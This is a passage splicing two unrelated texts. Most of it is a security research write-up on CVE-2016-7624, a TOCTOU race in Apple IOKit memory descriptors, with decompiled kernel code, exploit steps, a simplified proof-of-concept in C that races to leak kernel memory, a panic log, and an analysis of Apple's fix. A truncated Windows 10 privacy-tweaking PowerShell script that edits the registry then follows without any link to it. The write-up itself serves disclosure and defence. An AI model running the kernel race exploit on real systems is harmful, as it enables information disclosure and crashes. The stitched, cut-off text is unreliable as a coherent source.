            in  ool_input       : mach_vm_address_t;
            in  ool_input_size  : mach_vm_size_t;

            out inband_output   : io_struct_inband_t, CountInOut;
            out scalar_output   : io_scalar_inband64_t, CountInOut;
            in  ool_output      : mach_vm_address_t;
            inout ool_output_size : mach_vm_size_t
            );

The following code is generated:

    /* Routine io_connect_method */
    mig_external kern_return_t io_connect_method
    (
        mach_port_t connection,
        uint32_t selector,
        io_scalar_inband64_t scalar_input,
        mach_msg_type_number_t scalar_inputCnt,
        io_struct_inband_t inband_input,
        mach_msg_type_number_t inband_inputCnt,
        mach_vm_address_t ool_input,
        mach_vm_size_t ool_input_size,
        io_struct_inband_t inband_output,
        mach_msg_type_number_t *inband_outputCnt,
        io_scalar_inband64_t scalar_output,
        mach_msg_type_number_t *scalar_outputCnt,
        mach_vm_address_t ool_output,
        mach_vm_size_t *ool_output_size
    )
    {
        //...
        (void)memcpy((char *) InP->scalar_input, (const char *) scalar_input, 8 * scalar_inputCnt);
        //...
        if (inband_inputCnt > 4096) {
            { return MIG_ARRAY_TOO_LARGE; }
        }
        (void)memcpy((char *) InP->inband_input, (const char *) inband_input, inband_inputCnt);
        //...
        InP->ool_input = ool_input;
        InP->ool_input_size = ool_input_size;

OK, it seems scalar input and struct input with size < 4096 are copied and bundled inband in the mach msg, then passed into kernel space. No way. However, struct input with size > 4096 remains a mach_vm_address and is untouched. Now let's dive into kernel space.

    kern_return_t is_io_connect_method
    (
        io_connect_t connection,
        uint32_t selector,
        io_scalar_inband64_t scalar_input,
        mach_msg_type_number_t scalar_inputCnt,
        io_struct_inband_t inband_input,
        mach_msg_type_number_t inband_inputCnt,
        mach_vm_address_t ool_input,
        mach_vm_size_t ool_input_size,
        io_struct_inband_t inband_output,
        mach_msg_type_number_t *inband_outputCnt,
        io_scalar_inband64_t scalar_output,
        mach_msg_type_number_t *scalar_outputCnt,
        mach_vm_address_t ool_output,
        mach_vm_size_t *ool_output_size
    )
    {
        CHECK( IOUserClient, connection, client );

        IOExternalMethodArguments args;
        IOReturn ret;
        IOMemoryDescriptor * inputMD = 0;
        IOMemoryDescriptor * outputMD = 0;
        //...
        args.scalarInput = scalar_input;
        args.scalarInputCount = scalar_inputCnt;
        args.structureInput = inband_input;
        args.structureInputSize = inband_inputCnt;

        if (ool_input)
            inputMD = IOMemoryDescriptor::withAddressRange(ool_input, ool_input_size,
                        kIODirectionOut, current_task());

        args.structureInputDescriptor = inputMD;
        //...
        if (ool_output && ool_output_size)
        {
            outputMD = IOMemoryDescriptor::withAddressRange(ool_output, *ool_output_size,
                        kIODirectionIn, current_task());
        //...
        return (ret);
    }

It seems Apple and Linus take a different approach here. In the Linux kernel, incoming userspace content is usually copied to kernel-allocated memory using copy_from_user. Here, however, the Apple kernel directly creates a memory descriptor from the userspace address rather than making a copy.
So can we modify this memory content in userspace after it's passed to the kernel via an IOKit call? Surprisingly, the answer is yes! This means that, for an IOKit call, if the corresponding IOService accepts an input memory descriptor, the userspace program can alter the content while the IOService is processing it: no lock, no write prevention. A juicy place for race conditions and TOCTOUs (time to check before time to use).

After this bug was fixed I talked to security folks at Apple and they said even they didn't realize the descriptor-mapped memory is writable by userspace. I quickly identified several potentially vulnerable patterns in IOReportUserClient, IOCommandQueue and IOSurface; one of them (CVE-2016-7624) is described below. And there're far more patterns than that, use your imagination.

TOCTOU in IOCommandQueue can lead to information disclosure reachable from sandbox

There exists a TOCTOU in IOCommandQueue::submit_command_buffer. This function accepts either an inband struct or a structureInputDescriptor. Data controlled by the attacker is passed into the function and at a certain offset a value is used as a length. The length is validated, but due to the nature of MemoryDescriptor, the client can still change the value when it's actually used by modifying the mapped memory, causing a TOCTOU that leads to information disclosure or another possible oob write.

Analysis

IOAccelCommandQueue::s_submit_command_buffers accepts user input IOExternalMethodArguments, and if structureInputDescriptor is passed in from a userspace-mapped address, it will use structureInputDescriptor, get an IOMemoryMap, then get its address and use it. But nothing prevents userspace from modifying the content at that address, leading to a TOCTOU.
    __int64 __fastcall IOAccelCommandQueue::s_submit_command_buffers(IOAccelCommandQueue *this, __int64 a2, IOExternalMethodArguments *a3)
    {
      IOExternalMethodArguments *v3; // r12@1
      IOAccelCommandQueue *v4; // r15@1
      unsigned __int64 inputdatalen; // rsi@1
      unsigned int v6; // ebx@1
      IOMemoryDescriptor *v7; // rdi@3
      __int64 v8; // r14@3
      __int64 inputdata; // rcx@5

      v3 = a3;
      v4 = this;
      inputdatalen = (unsigned int)a3->structureInputSize;
      v6 = -536870206;
      if ( inputdatalen >= 8
        && inputdatalen - 8 == 3 * (((unsigned __int64)(0x0AAAAAAAAAAAAAAABLL * (unsigned __int128)(inputdatalen - 8) >> 64) >> 1) & 0x7FFFFFFFFFFFFFF8LL) )
      {
        v7 = (IOMemoryDescriptor *)a3->structureInputDescriptor;
        v8 = 0LL;
        if ( v7 )
        {
          v8 = (__int64)v7->vtbl->__ZN18IOMemoryDescriptor3mapEj(v7, 4096LL);
          v6 = -536870200;
          if ( !v8 )
            return v6;
          inputdata = (*(__int64 (__fastcall **)(__int64))(*(_QWORD *)v8 + 280LL))(v8);
          LODWORD(inputdatalen) = v3->structureInputSize;
        }

We can see that at offset +4, a DWORD is retrieved as the length and compared with

    ((unsigned __int64)(0x0AAAAAAAAAAAAAAABLL * (unsigned __int128)(inputdatalen - 8) >> 64) >> 1) & 0x7FFFFFFFFFFFFFF8LL)

And then this length offset is used again in submit_command_buffer. See the following code:

      if ( *((_QWORD *)this + 160) )
      {
        v5 = (IOAccelShared2 *)*((_QWORD *)this + 165);
        if ( v5 )
        {
          IOAccelShared2::processResourceDirtyCommands(v5);
          IOAccelCommandQueue::updatePriority((IOAccelCommandQueue *)v2);
          if ( *(_DWORD *)(input + 4) )
          {
            v6 = (unsigned __int64 *)(input + 24);
            v7 = 0LL;
            do
            {
              IOAccelCommandQueue::submitCommandBuffer(
                (IOAccelCommandQueue *)v2,
                *((_DWORD *)v6 - 4),//v6 based on input
                *((_DWORD *)v6 - 3),//based on input
                *(v6 - 1),//based on input
                *v6);//based on input
              ++v7;
              v6 += 3;
            }
            while ( v7 < *(unsigned int *)(input + 4) ); //NOTICE HERE
          }

Notice in the loop condition marked NOTICE HERE that *(input+4) is accessed again as the loop boundary.
However, if the user passes in a descriptor, they can modify it in userland and bypass the check in s_submit_command_buffers, causing the loop to go out of bounds. In IOAccelCommandQueue::submitCommandBuffer, in the following statement:

    IOGraphicsAccelerator2::sendBlockFenceNotification(
      *((IOGraphicsAccelerator2 **)this + 166),
      (unsigned __int64 *)(*((_QWORD *)this + 160) + 16LL),
      data_from_input_add_24_minus_8,
      0LL,
      v13);
    result = IOGraphicsAccelerator2::sendBlockFenceNotification(
      *((IOGraphicsAccelerator2 **)this + 166),
      (unsigned __int64 *)(*((_QWORD *)this + 160) + 16LL),
      data_from_input_add_24,
      0LL,
      v13);

The memory content is sent back to user space if a notification callback is installed. So if an attacker can carefully control some sensitive memory to be placed after the mapped descriptor memory, the OOB read can get this content back to userspace, leading to an infoleak.

The exploit steps are:

1. The userspace program mmaps a memory page and passes it as the iokit call argument structureInputDescriptor.
2. s_submit_command_buffer validates that the content at +4 is legal compared to the total incoming structureInput length.
3. submit_command_buffer iterates over the descriptor memory passed in from userspace, using the value at +4 as the boundary length indicator.
4. Memory content read is calculated in submitCommandBuffer and sent back to userspace via the installed asyncNotificationPort.
5. The userspace program races to modify this +4 offset value, causing the loop to go out of bounds, leaking adjacent memory in kernel address space.

Notice that inputdatalen is first retrieved from structureInputSize, so we cannot directly use the IOConnectCallMethod API, because in this API structureInput and structureInputDescriptor cannot be passed at the same time. Instead we directly call the _io_connect_method private function in the IOKit framework, which accepts structureInput and structureInputDescriptor at the same time.

POC code

POC code for these three vulns can all be found at https://github.com/flankerhqd/descriptor-describes-racing.
Here is one simplified version:

    volatile unsigned int secs = 10;
    void modifystrcut() {
        *((unsigned int*)(input+4)) = 0x7fffffff;
        printf("secs %x\n", secs);
    }
    //...
    int main(int argc, const char * argv[]) {
        io_iterator_t iterator;
        //...
        getFunc();
        io_connect_t conn;
        io_service_t svc;
        //...
        IOServiceGetMatchingServices(kIOMasterPortDefault, IOServiceMatching("IntelAccelerator"), &iterator);
        svc = IOIteratorNext(iterator);
        printf("%x %x\n", IOServiceOpen(svc, mach_task_self(), 9, &conn), conn);
        //...
        io_connect_t sharedconn;
        IOServiceOpen(svc, mach_task_self(), 6, &sharedconn);
        IOConnectAddClient(conn, sharedconn);
        //then set async ref
        ref = IONotificationPortCreate(kIOMasterPortDefault);
        port = IONotificationPortGetMachPort(ref);
        pthread_t rt;
        pthread_create(&rt, NULL, gaorunloop, NULL);
        io_async_ref64_t asyncRef;
        asyncRef[kIOAsyncCalloutFuncIndex] = callback;
        asyncRef[kIOAsyncCalloutRefconIndex] = NULL;
        //...
        const uint32_t outputcnt = 0;
        const size_t outputcnt64 = 0;
        IOConnectCallAsyncScalarMethod(conn, 0, port, asyncRef, 3, NULL, 0, NULL, &outputcnt);
        //...
        size_t i=0;
        input = dommap();
        {
            char* structinput = input;
            *((unsigned int*)(structinput+4)) = 0xaa;//the size is then used in for loop, possible to change it in descriptor?
            size_t outcnt = 0;
        }
        //...
        const size_t bufsize = 4088;
        char buf[bufsize];
        memset(buf, 'a', sizeof(buf)); // fill the whole inband buffer (original had sizeof(buf)*bufsize, an overrun)
        size_t outcnt =0;
        *((unsigned int*)(buf+4)) = 0xaa;
        //...
        {
            pthread_t t;
            pthread_create(&t, NULL, modifystrcut, NULL);
            //...
            io_connect_method(
                conn,
                1,
                NULL,//input
                0,//inputCnt
                buf,//inb_input
                bufsize,//inb_input_size
                reinterpret_cast_mach_vm_address_t(input),//ool_input
                ool_size,//ool_input_size
                buf,//inb_output
                (mach_msg_type_number_t*)&outputcnt, //inb_output_size*
                (uint64_t*)buf,//output
                &outputcnt, //outputCnt
                reinterpret_cast_mach_vm_address_t(buf), //ool_output
                (mach_msg_type_number_t*)&outputcnt64//ool_output_size*
            );
        }

Two key constants are 4088 and 0xaa; these two numbers satisfy the check at

    inputdatalen - 8 == 3 * (((unsigned __int64)(0x0AAAAAAAAAAAAAAABLL * (unsigned __int128)(inputdatalen - 8) >> 64) >> 1) & 0x7FFFFFFFFFFFFFF8LL) )

and

    if ( *(_DWORD *)(inputdata + 4) == (unsigned int)((unsigned __int64)(0x0AAAAAAAAAAAAAAABLL * (unsigned __int128)((unsigned __int64)(unsigned int)inputdatalen - 8) >> 64) >> 4) )

Panic Report

    panic(cpu 0 caller 0xffffff801dfce5fa): Kernel trap at 0xffffff7fa039d2a4, type 14=page fault, registers:
    CR0: 0x0000000080010033, CR2: 0xffffff812735f000, CR3: 0x000000000ce100ab, CR4: 0x00000000001627e0
    RAX: 0x000000007fffffff, RBX: 0xffffff812735f008, RCX: 0x0000000000000000, RDX: 0x0000000000000000
    RSP: 0xffffff81276d3b60, RBP: 0xffffff81276d3b80, RSI: 0x0000000000000000, RDI: 0xffffff802fcaef80
    R8:  0x00000000ffffffff, R9:  0x0000000000000002, R10: 0x0000000000000007, R11: 0x0000000000007fff
    R12: 0xffffff8031862800, R13: 0xaaaaaaaaaaaaaaab, R14: 0xffffff812735e000, R15: 0x00000000000000aa
    RFL: 0x0000000000010293, RIP: 0xffffff7fa039d2a4, CS:  0x0000000000000008, SS:  0x0000000000000010
    Fault CR2: 0xffffff812735f000, Error code: 0x0000000000000000, Fault CPU: 0x0, PL: 0

    Backtrace (CPU 0), Frame : Return Address
    0xffffff81276d37f0 : 0xffffff801dedab12 mach_kernel : _panic + 0xe2
    0xffffff81276d3870 : 0xffffff801dfce5fa mach_kernel : _kernel_trap + 0x91a
    0xffffff81276d3a50 : 0xffffff801dfec463 mach_kernel : _return_from_trap + 0xe3
    0xffffff81276d3a70 : 0xffffff7fa039d2a4 com.apple.iokit.IOAcceleratorFamily2 : __ZN19IOAccelCommandQueue22submit_command_buffersEPK29IOAccelCommandQueueSubmitArgs + 0x8e
    0xffffff81276d3b80 : 0xffffff7fa039c92c com.apple.iokit.IOAcceleratorFamily2 : __ZN19IOAccelCommandQueue24s_submit_command_buffersEPS_PvP25IOExternalMethodArguments + 0xba
    0xffffff81276d3bc0 : 0xffffff7fa03f6db5 com.apple.driver.AppleIntelHD5000Graphics : __ZN19IGAccelCommandQueue14externalMethodEjP25IOExternalMethodArgumentsP24IOExternalMethodDispatchP8OSObjectPv + 0x19
    0xffffff81276d3be0 : 0xffffff801e4dfa07 mach_kernel : _is_io_connect_method + 0x1e7
    0xffffff81276d3d20 : 0xffffff801df97eb0 mach_kernel : _iokit_server + 0x5bd0
    0xffffff81276d3e30 : 0xffffff801dedf283 mach_kernel : _ipc_kobject_server + 0x103
    0xffffff81276d3e60 : 0xffffff801dec28b8 mach_kernel : _ipc_kmsg_send + 0xb8
    0xffffff81276d3ea0 : 0xffffff801ded2665 mach_kernel : _mach_msg_overwrite_trap + 0xc5
    0xffffff81276d3f10 : 0xffffff801dfb8dca mach_kernel : _mach_call_munger64 + 0x19a
    0xffffff81276d3fb0 : 0xffffff801dfecc86 mach_kernel : _hndl_mach_scall64 + 0x16
          Kernel Extensions in backtrace:
             com.apple.iokit.IOAcceleratorFamily2(205.10)[949D9C27-0635-3EE4-B836-373871BC6247]@0xffffff7fa0374000->0xffffff7fa03dffff
                dependency: com.apple.iokit.IOPCIFamily(2.9)[D8216D61-5209-3B0C-866D-7D8B3C5F33FF]@0xffffff7f9e72c000
                dependency: com.apple.iokit.IOGraphicsFamily(2.4.1)[172C2960-EDF5-382D-80A5-C13E97D74880]@0xffffff7f9f232000
             com.apple.driver.AppleIntelHD5000Graphics(10.1.4)[E5BC31AC-4714-3A57-9CDC-3FF346D811C5]@0xffffff7fa03ee000->0xffffff7fa047afff
                dependency: com.apple.iokit.IOSurface(108.2.1)[B5ADE17A-36A5-3231-B066-7242441F7638]@0xffffff7f9f0fb000
                dependency: com.apple.iokit.IOPCIFamily(2.9)[D8216D61-5209-3B0C-866D-7D8B3C5F33FF]@0xffffff7f9e72c000
                dependency: com.apple.iokit.IOGraphicsFamily(2.4.1)[172C2960-EDF5-382D-80A5-C13E97D74880]@0xffffff7f9f232000
                dependency: com.apple.iokit.IOAcceleratorFamily2(205.10)[949D9C27-0635-3EE4-B836-373871BC6247]@0xffffff7fa0374000

    BSD process name corresponding to current thread: cmdqueue1
    Boot args: keepsyms=1 -v

    Mac OS version:
    15F34

    Kernel version:
    Darwin Kernel Version 15.5.0: Tue Apr 19 18:36:36 PDT 2016; root:xnu-3248.50.21~8/RELEASE_X86_64
    Kernel UUID: 7E7B0822-D2DE-3B39-A7A5-77B40A668BC6
    Kernel slide:     0x000000001dc00000
    Kernel text base: 0xffffff801de00000
    __HIB  text base: 0xffffff801dd00000
    System model name: MacBookAir6,2 (Mac-7DF21CB3ED6977E5)

Disassembling the RIP register:

    __text:000000000002929E    mov     esi, [rbx-10h]  ; unsigned int
    __text:00000000000292A1    mov     edx, [rbx-0Ch]  ; unsigned int
    __text:00000000000292A4    mov     rcx, [rbx-8]    ; unsigned __int64
    __text:00000000000292A8    mov     r8, [rbx]       ; unsigned __int64

We can see that at the crash address, rbx has already gone out of bounds and hits an adjacent unmapped area, leading to the crash.

Tested on 10.11.5 MacBook Airs and MacBook Pros with the command line:

    while true; do ./cmdqueue1 ; done

Fix for these issues

The sources for XNU in 10.11.2 haven't been released, but let's have a look at the disassembled kernel. Originally, we have these lines when creating a descriptor:

    if (ool_input)
        inputMD = IOMemoryDescriptor::withAddressRange(ool_input, ool_input_size,
                    kIODirectionOut, current_task());

Proved by disassembling the unpatched kernel:

    mov     rax, gs:8
    mov     rcx, [rax+308h] ; unsigned int
    mov     edx, 2          ; unsigned __int64
    mov     rsi, [rbp+arg_8] ; unsigned __int64
    call    __ZN18IOMemoryDescriptor16withAddressRangeEyyjP4task ; IOMemoryDescriptor::withAddressRange(ulong long,ulong long,uint,task *)
    mov     r15, rax

While on 10.11.2, the corresponding snippet in _is_io_connect_method changed to:

    mov     rax, gs:8
    mov     rcx, [rax+318h] ; unsigned int
    mov     edx, 20002h     ; unsigned __int64
    mov     rsi, [rbp+arg_8] ; unsigned __int64
    call    __ZN18IOMemoryDescriptor16withAddressRangeEyyjP4task ; IOMemoryDescriptor::withAddressRange(ulong long,ulong long,uint,task *)
    mov     r15, rax

A new flag (0x20000) is introduced to IOMemoryDescriptor::withAddressRange.
The flag is later checked in IOGeneralMemoryDescriptor::memoryReferenceCreate, as shown in a diaphora diff of IOMemoryDescriptor's functions.

    if ( this->_task && !err && this->baseclass_0._flags & 0x20000 && !(optionsa & 4) ) //newly added source
        err = IOGeneralMemoryDescriptor::memoryReferenceCreate(this, optionsa | 4, &ref->mapRef);

And it is then checked at the beginning of this function:

    prot = 1;
    cacheMode = (this->baseclass_0._flags & 0x70000000) >> 28;
    v4 = vmProtForCacheMode(cacheMode);
    prot |= v4;
    if ( cacheMode )
        prot |= 2u;
    if ( 2 != (this->baseclass_0._flags & 3) )
        prot |= 2u;
    if ( optionsa & 2 )
        prot |= 2u;
    if ( optionsa & 4 )
        prot |= 0x200000u;

prot is used in mach_make_memory_entry_64, describing the permission of this mapping. 0x200000 is actually MAP_MEM_VM_COPY:

    /* leave room for vm_prot bits */
    #define MAP_MEM_ONLY            0x010000 /* change processor caching  */
    #define MAP_MEM_NAMED_CREATE    0x020000 /* create extant object      */
    #define MAP_MEM_PURGABLE        0x040000 /* create a purgable VM object */
    #define MAP_MEM_NAMED_REUSE     0x080000 /* reuse provided entry if identical */
    #define MAP_MEM_USE_DATA_ADDR   0x100000 /* preserve address of data, rather than base of page */
    #define MAP_MEM_VM_COPY         0x200000 /* make a copy of a VM range */
    #define MAP_MEM_VM_SHARE        0x400000 /* extract a VM range for remap */
    #define MAP_MEM_4K_DATA_ADDR    0x800000 /* preserve 4K aligned address of data */

Which means descriptors passed in via IOKit now have a memory entry that is possibly COW, preventing userspace from modifying it in 10.12.2 and iOS 10.2. Rather than fixing driver issues one by one, Apple seems to have done a good job by patching the entry.

Credits

Credit also goes to Liang Chen of KeenLab for also contributing to this research. Also kudos to the Apple security team for responding and fixing these issues.

Source: http://keenlab.tencent.com/en/2017/01/09/Racing-for-everyone-descriptor-describes-TOCTOU-in-Apple-s-core/
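As an added example (not code from the Keen Lab post, the POC repository or Apple), the C program below models the submit_command_buffers length check described in the post and contrasts the re-read loop bound that caused CVE-2016-7624 with a copy-in snapshot of the header; the 8-byte header, the 32-bit count at +4, the 24-byte entries and the 4088/0xaa values come from the post, while the function names, the walk_result_t type and the 200-entry cap on the simulated walk are this example's own assumptions. Apple's actual fix made the descriptor mapping copy-on-write at the IOKit entry point; the driver-side copy-in discipline shown here is the complementary mitigation a driver author controls.

```c
/* Added example: models the check-then-use pattern from the post above.
 * Assumed layout (from the post): 8-byte header, 32-bit entry count at
 * offset +4, then 24-byte entries. All function names are this example's own. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define HDR_SIZE   8
#define ENTRY_SIZE 24

typedef struct {
    size_t in_bounds;      /* entries inside the validated input length */
    size_t out_of_bounds;  /* entries the loop reached past that length */
} walk_result_t;

/* Mirrors the two checks in s_submit_command_buffers: (len - 8) must be a
 * multiple of 24 (the 0xAAAA...AB multiply in the decompilation is the
 * compiler's divide-by-24 trick) and the count at +4 must equal (len-8)/24. */
int validate_submit_args(const uint8_t *hdr, size_t len)
{
    if (len < HDR_SIZE || (len - HDR_SIZE) % ENTRY_SIZE != 0)
        return 0;
    uint32_t count;
    memcpy(&count, hdr + 4, sizeof count);
    return (size_t)count == (len - HDR_SIZE) / ENTRY_SIZE;
}

/* Vulnerable pattern, as in the decompiled submit_command_buffers: the loop
 * bound is re-read from caller-writable memory on every iteration, so a
 * writer racing between check and use can push it past validated_len.
 * `limit` only keeps this model from running away; the kernel walked on
 * until it hit an unmapped page and panicked. */
walk_result_t walk_reread(const uint8_t *shared, size_t validated_len, size_t limit)
{
    walk_result_t r = {0, 0};
    size_t i = 0;
    uint32_t count;
    memcpy(&count, shared + 4, sizeof count);
    if (count == 0)
        return r;
    do {
        if (HDR_SIZE + (i + 1) * ENTRY_SIZE <= validated_len)
            r.in_bounds++;
        else
            r.out_of_bounds++;       /* the OOB read the post describes */
        i++;
        memcpy(&count, shared + 4, sizeof count);   /* TOCTOU: second read */
    } while (i < count && i < limit);
    return r;
}

/* Hardened pattern: the bound comes from a header copy taken at check time,
 * so later writes to the shared page cannot change it. */
walk_result_t walk_from_snapshot(const uint8_t *hdr, size_t validated_len)
{
    walk_result_t r = {0, 0};
    uint32_t count;
    memcpy(&count, hdr + 4, sizeof count);
    for (size_t i = 0; i < count; i++) {
        if (HDR_SIZE + (i + 1) * ENTRY_SIZE <= validated_len)
            r.in_bounds++;
        else
            r.out_of_bounds++;       /* unreachable once the copy was validated */
    }
    return r;
}

/* Replays the scenario from the post: a 4088-byte input whose count is 0xaa
 * (170), validated first, then optionally rewritten by the caller before use.
 * Returns what the use-time loop touched. The buffer is constructed here. */
walk_result_t simulate(int race_after_check, int hardened)
{
    enum { LEN = 4088, WALK_LIMIT = 200 };
    static uint8_t shared[LEN];              /* stands in for the user-mapped page */
    memset(shared, 'a', LEN);
    uint32_t count = (LEN - HDR_SIZE) / ENTRY_SIZE;   /* 170 == 0xaa */
    memcpy(shared + 4, &count, sizeof count);

    /* Check time: copy the header in and validate the copy. */
    uint8_t hdr_copy[HDR_SIZE];
    memcpy(hdr_copy, shared, HDR_SIZE);
    walk_result_t rejected = {0, 0};
    if (!validate_submit_args(hdr_copy, LEN))
        return rejected;

    /* Between check and use: the caller's racing thread rewrites +4. */
    if (race_after_check) {
        uint32_t evil = 0x7fffffff;
        memcpy(shared + 4, &evil, sizeof evil);
    }

    /* Use time. */
    return hardened ? walk_from_snapshot(hdr_copy, LEN)
                    : walk_reread(shared, LEN, WALK_LIMIT);
}

int main(void)
{
    const char *names[] = {"no race, re-read", "race, re-read", "race, snapshot"};
    walk_result_t rs[] = {simulate(0, 0), simulate(1, 0), simulate(1, 1)};
    for (int i = 0; i < 3; i++)
        printf("%-18s in-bounds=%zu out-of-bounds=%zu\n",
               names[i], rs[i].in_bounds, rs[i].out_of_bounds);
    return 0;
}
```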
-
"Reclaim Windows 10" turns off a bunch of unnecessary Windows 10 telemetry, removes bloatware, and privacy invasions. Review and tweak before running. Scripts for reversing are included and commented. Fork via https://github.com/Disassembler0 (different defaults)

    ##########
    # Win10 Initial Setup Script
    # Author: Disassembler <disassembler@dasm.cz>
    # Version: 1.7, 2016-08-15
    # dasm's script: https://github.com/Disassembler0/Win10-Initial-Setup-Script/
    # THIS IS A PERSONALIZED VERSION
    # This script leaves more MS defaults on, including MS security features.
    # Tweaked based on personal preferences for @alirobe 2016-11-16 - v1.7.1
    # NOTE: READ THIS SCRIPT CAREFULLY BEFORE RUNNING IT. ADJUST COMMENTS AS APPROPRIATE.
    # This script will reboot your machine when completed.
    # Setting up a new machine? See http://ninite.com (for devs, http://chocolatey.org)
    ##########

    # Ask for elevated permissions if required
    If (!([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")) {
        Start-Process powershell.exe "-NoProfile -ExecutionPolicy Bypass -File `"$PSCommandPath`"" -Verb RunAs
        Exit
    }

    ##########
    # Privacy Settings
    ##########

    # Disable Telemetry
    Write-Host "Disabling Telemetry..."
    Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\DataCollection" -Name "AllowTelemetry" -Type DWord -Value 0
    Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\DataCollection" -Name "AllowTelemetry" -Type DWord -Value 0
    Set-ItemProperty -Path "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\DataCollection" -Name "AllowTelemetry" -Type DWord -Value 0

    # Enable Telemetry
    # Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\DataCollection" -Name "AllowTelemetry" -Type DWord -Value 3
    # Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\DataCollection" -Name "AllowTelemetry" -Type DWord -Value 3
    # Set-ItemProperty -Path "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\DataCollection" -Name "AllowTelemetry" -Type DWord -Value 3

    # Disable Wi-Fi Sense
    Write-Host "Disabling Wi-Fi Sense..."
    If (!(Test-Path "HKLM:\Software\Microsoft\PolicyManager\default\WiFi\AllowWiFiHotSpotReporting")) {
        New-Item -Path "HKLM:\Software\Microsoft\PolicyManager\default\WiFi\AllowWiFiHotSpotReporting" -Force | Out-Null
    }
    Set-ItemProperty -Path "HKLM:\Software\Microsoft\PolicyManager\default\WiFi\AllowWiFiHotSpotReporting" -Name "Value" -Type DWord -Value 0
    Set-ItemProperty -Path "HKLM:\Software\Microsoft\PolicyManager\default\WiFi\AllowAutoConnectToWiFiSenseHotspots" -Name "Value" -Type DWord -Value 0

    # Enable Wi-Fi Sense
    # Set-ItemProperty -Path "HKLM:\Software\Microsoft\PolicyManager\default\WiFi\AllowWiFiHotSpotReporting" -Name "Value" -Type DWord -Value 1
    # Set-ItemProperty -Path "HKLM:\Software\Microsoft\PolicyManager\default\WiFi\AllowAutoConnectToWiFiSenseHotspots" -Name "Value" -Type DWord -Value 1

    # Disable SmartScreen Filter
    # Write-Host "Disabling SmartScreen Filter..."
    # Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer" -Name "SmartScreenEnabled" -Type String -Value "Off"
    # Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\AppHost" -Name "EnableWebContentEvaluation" -Type DWord -Value 0

    # Enable SmartScreen Filter
    # Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer" -Name "SmartScreenEnabled" -Type String -Value "RequireAdmin"
    # Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\AppHost" -Name "EnableWebContentEvaluation"

    # Disable Bing Search in Start Menu
    Write-Host "Disabling Bing Search in Start Menu..."
    Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Search" -Name "BingSearchEnabled" -Type DWord -Value 0

    # Enable Bing Search in Start Menu
    # Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Search" -Name "BingSearchEnabled"

    # Disable Start Menu suggestions
    Write-Host "Disabling Start Menu suggestions..."
    Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" -Name "SystemPaneSuggestionsEnabled" -Type DWord -Value 0

    # Enable Start Menu suggestions
    # Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" -Name "SystemPaneSuggestionsEnabled" -Type DWord -Value 1

    # Disable Location Tracking
    Write-Host "Disabling Location Tracking..."
    Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Sensor\Overrides\{BFA794E4-F964-4FDB-90F6-51056BFE4B44}" -Name "SensorPermissionState" -Type DWord -Value 0
    Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Services\lfsvc\Service\Configuration" -Name "Status" -Type DWord -Value 0

    # Enable Location Tracking
    # Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Sensor\Overrides\{BFA794E4-F964-4FDB-90F6-51056BFE4B44}" -Name "SensorPermissionState" -Type DWord -Value 1
    # Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Services\lfsvc\Service\Configuration" -Name "Status" -Type DWord -Value 1

    # Disable Feedback
    Write-Host "Disabling Feedback..."
    If (!(Test-Path "HKCU:\Software\Microsoft\Siuf\Rules")) {
        New-Item -Path "HKCU:\Software\Microsoft\Siuf\Rules" -Force | Out-Null
    }
    Set-ItemProperty -Path "HKCU:\Software\Microsoft\Siuf\Rules" -Name "NumberOfSIUFInPeriod" -Type DWord -Value 0

    # Enable Feedback
    # Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Siuf\Rules" -Name "NumberOfSIUFInPeriod"

    # Disable Advertising ID
    Write-Host "Disabling Advertising ID..."
    If (!(Test-Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\AdvertisingInfo")) {
        New-Item -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\AdvertisingInfo" | Out-Null
    }
    Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\AdvertisingInfo" -Name "Enabled" -Type DWord -Value 0

    # Enable Advertising ID
    # Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\AdvertisingInfo" -Name "Enabled"

    # Disable Cortana
    Write-Host "Disabling Cortana..."
    If (!(Test-Path "HKCU:\Software\Microsoft\Personalization\Settings")) {
        New-Item -Path "HKCU:\Software\Microsoft\Personalization\Settings" -Force | Out-Null
    }
    Set-ItemProperty -Path "HKCU:\Software\Microsoft\Personalization\Settings" -Name "AcceptedPrivacyPolicy" -Type DWord -Value 0
    If (!(Test-Path "HKCU:\Software\Microsoft\InputPersonalization")) {
        New-Item -Path "HKCU:\Software\Microsoft\InputPersonalization" -Force | Out-Null
    }
    Set-ItemProperty -Path "HKCU:\Software\Microsoft\InputPersonalization" -Name "RestrictImplicitTextCollection" -Type DWord -Value 1
    Set-ItemProperty -Path "HKCU:\Software\Microsoft\InputPersonalization" -Name "RestrictImplicitInkCollection" -Type DWord -Value 1
    If (!(Test-Path "HKCU:\Software\Microsoft\InputPersonalization\TrainedDataStore")) {
